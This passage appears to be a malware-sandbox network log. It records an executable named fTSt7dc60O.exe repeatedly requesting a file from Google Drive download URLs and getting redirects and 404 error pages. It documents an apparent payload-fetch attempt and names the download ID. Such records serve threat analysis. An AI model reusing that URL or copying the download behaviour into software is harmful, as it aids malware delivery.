                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:16 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:16 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgR8F2yw_7PkrsHvGToRrzvC0tPnOg1bpkxDRE_ZfI6h1XXqaiGqJsROg4P-OAu8v2Vr
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:16 GMT
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: script-src 'nonce-HFAAB58pqtatZqrZF6aAZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:16 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 70 53 4b 69 58 7a 78 66 42 67 61 61 67 6d 2d 42 77 54 6a 48 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="upSKiXzxfBgaagm-BwTjHA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.752087172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:17 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:17 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:17 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-9EAYi_IRVA5ik-fqU-biDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.752096142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:18 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:18 UTC1851INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC6jDpoRhB22UYIVkvBabWEXrunev6AKw4RVe3hNHklu9apobvC08KYe9zCNwMp2ROhdYlGwrno
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:18 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-qvB0efGXTjX0_JNoLP4AWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:18 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 6c 31 75 78 54 68 77 66 6e 33 56 65 63 45 34 68 48 33 56 56 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vl1uxThwfn3VecE4hH3VVg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.752104172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:19 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:20 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:19 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: script-src 'nonce-EP2rc61UYJf113cxUpyNxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.752112142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:20 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:21 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC5_fc1ipyVIv6tpaZPwVC0iEOmAWExlV7j6f3CkakvZUD_I6rjRiHABRTHImHShlfRI
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:20 GMT
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-JLxsTBT3zNKdTnhFbOvnXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:21 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 6e 34 4f 59 45 72 70 2d 36 6c 2d 42 33 4e 72 4a 57 53 6e 74 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4n4OYErp-6l-B3NrJWSntA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.752119172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:21 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:22 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:22 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-mf5z1FABYyJM2S7M14NUew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.752128142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:22 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:23 UTC1851INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgRuAENb4Xc5vjZb_gZTGp5BHMRdfak_SUIp7LWcCMnZ1-7ssk5nzrlIim4E_FHp6j9zyIEQeLA
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:23 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-2UuSLVTw0_P940hhDbxR1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:23 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 75 4d 69 39 65 78 48 2d 61 66 50 70 48 34 4e 32 63 6b 52 61 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5uMi9exH-afPpH4N2ckRaQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.752138172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:24 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:24 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:24 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
